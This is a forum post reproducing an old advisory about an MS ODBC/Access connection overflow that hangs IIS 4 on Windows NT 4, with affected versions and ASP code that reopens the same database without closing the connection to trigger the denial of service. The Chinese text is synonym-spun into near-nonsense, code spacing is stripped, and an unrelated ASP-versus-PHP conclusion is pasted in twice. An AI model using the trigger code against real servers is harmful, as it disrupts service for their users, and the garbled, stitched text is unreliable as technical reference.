|
|
马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
结论:和PHP一样,ASP简单而易于维护,很适合小型网站应用,通过DCOM和MTS技术,ASP甚至还可以完成小规模的企业应用,但ASP的致命缺点就是不支持跨平台的系统,在大型项目开发和维护上非常困难。办理18、MSODBC数据库毗连溢出招致NT/9x回绝服务打击
漏洞描述:
MicrosoftODBC数据库在毗连和断开时大概存在潜伏的溢出成绩(MicrosoftACCESS数据库相干)。
假如不作废毗连而间接和第二个数据库相毗连,大概招致服务中断。
影响体系:
ODBC版本:3.510.3711.0
ODBCAccess驱动版本:3.51.1029.00
OS版本:WindowsNT4.0ServicePack5,IIS4.0(i386)
MicrosoftOffice97Professional(MSO97.dll:8.0.0.3507)
毛病检测办法以下:
ODBC毗连源称号:miscdb
ODBC数据库型号:MSAccess
ODBC假定路径:d:datamisc.mdb
ASP代码以下:
<%
setconnVB=server.createobject("ADODB.Connection")
connVB.open"DRIVER={MicrosoftAccessDriver(*.mdb)};DSN=miscdb"
%>
<html>
<body>
...lotsofhtmlremoved...
<!--WeConnecttoDB1-->
<%
setconnGlobal=server.createobject("ADODB.Connection")
connGlobal.Open"DSN=miscdb;User=sa"
mSQL="arbSQLStatement"
setrsGlobal=connGlobal.execute(mSQL)
WhilenotrsGlobal.eof
Response.WritersGlobal("resultfrommiscdb")
rsGlobal.movenext
wend
rsGlobal.close
setrsGlobal=nothing
connGlobal.close
setconnGlobal=nothing
NotewedoNOTclosetheconnection
%>
<!--CallthesamedatabasebymeansofDBQdirectfileaccess-->
<%
setconnGlobal=server.createobject("ADODB.Connection")
connGlobal.Open"DRIVER={MicrosoftAccessDriver(*.mdb)};
DBQ=d:datamisc.mdb"
mSQL="arbSQLStatement"
setrsGlobal=connGlobal.execute(mSQL)
WhilenotrsGlobal.eof
Response.WritersGlobal("resultfrommiscdb")
rsGlobal.movenext
wend
rsGlobal.close
setrsGlobal=nothing
connGlobal.close
setconnGlobal=nothing
NoteweDOclosetheconnection
%>
在这类情形下,IIS处置历程将会停留,CPU利用率因为inetinfo.exe历程将到达100%。只要从头启动盘算机才干恢复。
</p>结论:和PHP一样,ASP简单而易于维护,很适合小型网站应用,通过DCOM和MTS技术,ASP甚至还可以完成小规模的企业应用,但ASP的致命缺点就是不支持跨平台的系统,在大型项目开发和维护上非常困难。 |
|
|Archiver|手机版|仓酷云
鄂ICP备14007578号-2
发表于 2015-1-16 22:54:12
收藏
转播
分享
淘帖
顶
踩
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜